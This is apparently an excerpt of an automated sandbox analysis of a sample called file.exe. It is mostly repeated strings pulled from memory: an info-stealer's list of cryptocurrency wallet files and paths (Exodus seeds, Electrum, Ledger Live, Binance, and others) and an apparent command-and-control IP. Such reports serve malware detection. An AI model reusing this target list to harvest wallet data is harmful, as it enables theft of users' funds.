Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16bert\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
